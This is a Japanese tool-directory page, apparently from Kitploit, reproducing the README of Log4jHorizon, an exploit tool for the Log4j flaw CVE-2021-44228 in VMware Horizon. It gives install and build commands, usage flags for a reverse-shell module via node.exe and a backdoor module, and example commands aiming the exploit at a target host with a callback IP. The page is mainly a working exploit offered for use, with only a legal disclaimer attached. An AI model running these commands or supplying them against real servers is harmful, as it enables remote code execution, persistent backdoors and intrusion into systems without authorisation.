Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Log4jHorizon — CVE-2021-44228をVMWare Horizonで悪用し、リモートコード実行などを実現する。 | Kitploit
ツール/GitHubGitHub/puzzlepeaches/log4jhorizon
脆弱性スキャナーエクスプロイトウェブアプリケーション悪用ペネトレーションテストレッドチーミングリモートアクセスツールペイロード開発
GitHubpuzzlepeaches/log4jhorizon

Log4jHorizon

CVE-2021-44228をVMWare Horizonで悪用し、リモートコード実行などを実現する。

リポジトリを見る
120134年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Log4jHorizon

VMWare Horizon における CVE-2021-44228 を悪用し、リモートコード実行などを実現するツールです。

  • Crossing the Log4j Horizon - A Vulnerability With No Return

今回のコードと README.md は少し散らかっています。アップデート予定です!

なぜ?

この脆弱性の Proof of Concept は散在しており、手動で実行する必要があります。このリポジトリは、その悪用プロセスを自動化します。ポストエクスプロイテーションの指針については、上記のブログ記事を参照してください。

インストール

このリポジトリは、手動または Docker で使用できます。

手動インストール

エクスプロイトを手動でダウンロードして実行するには、以下の手順を実行します。まず、攻撃者ホストに Java と Maven がインストールされていることを確認してください。Debian ベースのオペレーティングシステムで apt を使用してこれを行うには、次のコマンドを実行します:

root@kitploit:~
apt update && apt install openjdk-11-jre maven

GitHub リポジトリをクローンし、すべての Python 要件をインストールします:

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && pip3 install -r requirements.txt

Log4jHorizon リポジトリのルートから、以下のコマンドを使用して Rogue-Jndi プロジェクトをコンパイルします:

root@kitploit:~
mvn package -f utils/rogue-jndi/

Docker インストール

まず、攻撃ホストに Docker がインストールされていることを確認してください。(この手順については説明しません)

その後、以下のコマンドを実行してリポジトリをクローンし、使用する Docker イメージをビルドします。

root@kitploit:~
git clone --recurse-submodules https://github.com/puzzlepeaches/Log4jHorizon \
    && cd Log4jHorizon && docker build -t Log4jHorizon .

コンテナを実行するには、コマンドラインフラグを追加して、次のようなコマンドを実行します。コンテナはリバースシェルをキャッチしないことに注意してください。別のシェルセッションで ncat リスナーを作成する必要があります:

root@kitploit:~
docker run -it -p 1389:1389 Log4jHorizon \
    -r -t horizon.acme.com -i 192.168.1.1 -p 4444

使用方法

root@kitploit:~
usage: exploit.py [-h] -t URL -i CALLBACK [-p PORT] [-r] [-b]

optional arguments:
  -h, --help            show this help message and exit
  -t URL, --target URL  VMWare Horizon IP
  -i CALLBACK, --ip CALLBACK
                        Callback IP for payload delivery and reverse shell.
  -p PORT, --port PORT  Callback port for reverse shell.
  -r, --revshell        Module to establish reverse shell using node.exe.
  -b, --backdoor        Module to add backdoor.

使用例

ローカルシステムにインストールしたツールを使用してリバースシェルを取得します:

root@kitploit:~
python3 exploit.py -r -t horizon.acme.com -p 442 -i 192.168.1.1

免責事項

このツールはペネトレーションテスト中に使用するために設計されています。事前の相互同意なしにターゲットを攻撃するためにこのツールを使用することは違法です。適用されるすべての地域、州、連邦法を遵守する責任はエンドユーザーにあります。開発者はいかなる責任も負わず、このプログラムの誤用についても責任を負いません。

ツールをダウンロード